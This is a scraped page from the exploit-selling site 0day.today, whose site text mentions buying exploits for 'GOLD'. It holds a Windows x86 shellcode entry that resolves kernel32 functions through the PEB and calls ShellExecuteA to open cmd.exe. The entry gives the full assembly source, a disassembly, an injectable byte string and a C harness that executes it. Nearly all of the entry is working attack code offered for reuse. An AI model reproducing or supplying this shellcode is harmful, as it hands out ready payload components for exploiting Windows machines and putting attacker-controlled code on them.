0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows/x86 - ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) Shellcode (250 bytes)
/* # Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode # Date : 22-06-2016 # Author : Roziul Hasan Khan Shifat # Tested on : Windows 7,10 x86 */ /* section .text global _start _start: xor ecx,ecx mov eax,[fs:ecx+0x30] ;EAX=PEB mov eax,[eax+0xc] ;EAX=PEB->Ldr mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList lodsd ; EAX=ntdll.dll xchg eax,esi ;EAX=ESI , ESI=EAX lodsd ; EAX=Third(kernel32) mov ebx,[eax+0x10] ;PVOID Dllbase (base address) ;------------------------------- mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY) mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames xor ecx,ecx ;----------------------- Get_func: inc ecx ;increment the ordinal lodsd ;Get name offset add eax,ebx ;(offset+kernel32.dll base adress)=Get function name cmp dword [eax],0x50746547 ;GetP jnz Get_func cmp dword [eax+0x4],0x41636f72 ;rocA jnz Get_func cmp dword [eax+0x8],0x65726464 ;ddre jnz Get_func ;--------------------- mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll mov cx,[esi+ecx*2] ;CX=Number of Function dec ecx mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions add esi,ebx ;ESI=beginning of Address table mov edx,[esi+ecx*4];EDX=Pointer(offset) add edx,ebx ;Edx=GetProcAddress ;----------------------------- xor esi,esi mov esi,edx ;backup of GetProcAddress xor edi,edi mov edi,ebx ;-------------- ;finding address of LoadLibraryA() xor ecx,ecx push ecx push 0x41797261 push 0x7262694c push 0x64616f4c push esp push ebx ;address of kernel32.dll call edx add esp,12 ;----------------- xor ecx,ecx ;finding address of ExitProcess push 0x42737365 mov [esp+3],cl push 0x636f7250 push 0x74697845 push esp push edi xor edi,edi mov edi,eax call esi ;---------------------------- add esp,12 ;LoadLibraryA("shell32.dll") xor ecx,ecx push ecx push 0x416c6c64 mov [esp+3],cl push 0x2e32336c push 0x6c656873 push esp xor edx,edx mov edx,edi ;Edx=LoadLibraryA mov edi,eax ;edi=ExitProcess call edx add esp,11 ;------------------ ;finding address of ShellExecuteA() xor ecx,ecx push 0x42424241 mov [esp+1],cl push 0x65747563 push 0x6578456c push 0x6c656853 push esp push eax call esi ;------------------- ;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1); add esp,13 xor ecx,ecx push 0x41657865 mov [esp+3],cl push 0x2e646d63 push esp pop ecx xor edx,edx inc edx push edx xor edx,edx push edx push edx push ecx push edx push edx call eax call edi */ /* Disassembly of section .text: 00401000 <_start>: 401000: 31 c9 xor %ecx,%ecx 401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 401006: 8b 40 0c mov 0xc(%eax),%eax 401009: 8b 70 14 mov 0x14(%eax),%esi 40100c: ad lods %ds:(%esi),%eax 40100d: 96 xchg %eax,%esi 40100e: ad lods %ds:(%esi),%eax 40100f: 8b 58 10 mov 0x10(%eax),%ebx 401012: 8b 53 3c mov 0x3c(%ebx),%edx 401015: 01 da add %ebx,%edx 401017: 8b 52 78 mov 0x78(%edx),%edx 40101a: 01 da add %ebx,%edx 40101c: 8b 72 20 mov 0x20(%edx),%esi 40101f: 01 de add %ebx,%esi 401021: 31 c9 xor %ecx,%ecx 00401023 <Get_func>: 401023: 41 inc %ecx 401024: ad lods %ds:(%esi),%eax 401025: 01 d8 add %ebx,%eax 401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 40102d: 75 f4 jne 401023 <Get_func> 40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 401036: 75 eb jne 401023 <Get_func> 401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 40103f: 75 e2 jne 401023 <Get_func> 401041: 8b 72 24 mov 0x24(%edx),%esi 401044: 01 de add %ebx,%esi 401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx 40104a: 49 dec %ecx 40104b: 8b 72 1c mov 0x1c(%edx),%esi 40104e: 01 de add %ebx,%esi 401050: 8b 14 8e mov (%esi,%ecx,4),%edx 401053: 01 da add %ebx,%edx 401055: 31 f6 xor %esi,%esi 401057: 89 d6 mov %edx,%esi 401059: 31 ff xor %edi,%edi 40105b: 89 df mov %ebx,%edi 40105d: 31 c9 xor %ecx,%ecx 40105f: 51 push %ecx 401060: 68 61 72 79 41 push $0x41797261 401065: 68 4c 69 62 72 push $0x7262694c 40106a: 68 4c 6f 61 64 push $0x64616f4c 40106f: 54 push %esp 401070: 53 push %ebx 401071: ff d2 call *%edx 401073: 83 c4 0c add $0xc,%esp 401076: 31 c9 xor %ecx,%ecx 401078: 68 65 73 73 42 push $0x42737365 40107d: 88 4c 24 03 mov %cl,0x3(%esp) 401081: 68 50 72 6f 63 push $0x636f7250 401086: 68 45 78 69 74 push $0x74697845 40108b: 54 push %esp 40108c: 57 push %edi 40108d: 31 ff xor %edi,%edi 40108f: 89 c7 mov %eax,%edi 401091: ff d6 call *%esi 401093: 83 c4 0c add $0xc,%esp 401096: 31 c9 xor %ecx,%ecx 401098: 51 push %ecx 401099: 68 64 6c 6c 41 push $0x416c6c64 40109e: 88 4c 24 03 mov %cl,0x3(%esp) 4010a2: 68 6c 33 32 2e push $0x2e32336c 4010a7: 68 73 68 65 6c push $0x6c656873 4010ac: 54 push %esp 4010ad: 31 d2 xor %edx,%edx 4010af: 89 fa mov %edi,%edx 4010b1: 89 c7 mov %eax,%edi 4010b3: ff d2 call *%edx 4010b5: 83 c4 0b add $0xb,%esp 4010b8: 31 c9 xor %ecx,%ecx 4010ba: 68 41 42 42 42 push $0x42424241 4010bf: 88 4c 24 01 mov %cl,0x1(%esp) 4010c3: 68 63 75 74 65 push $0x65747563 4010c8: 68 6c 45 78 65 push $0x6578456c 4010cd: 68 53 68 65 6c push $0x6c656853 4010d2: 54 push %esp 4010d3: 50 push %eax 4010d4: ff d6 call *%esi 4010d6: 83 c4 0d add $0xd,%esp 4010d9: 31 c9 xor %ecx,%ecx 4010db: 68 65 78 65 41 push $0x41657865 4010e0: 88 4c 24 03 mov %cl,0x3(%esp) 4010e4: 68 63 6d 64 2e push $0x2e646d63 4010e9: 54 push %esp 4010ea: 59 pop %ecx 4010eb: 31 d2 xor %edx,%edx 4010ed: 42 inc %edx 4010ee: 52 push %edx 4010ef: 31 d2 xor %edx,%edx 4010f1: 52 push %edx 4010f2: 52 push %edx 4010f3: 51 push %ecx 4010f4: 52 push %edx 4010f5: 52 push %edx 4010f6: ff d0 call *%eax 4010f8: ff d7 call *%edi */ #include<stdio.h> #include<string.h> char shellcode[]=\ "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7"; main() { printf("shellcode length %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); } # 0day.today [2024-12-24] #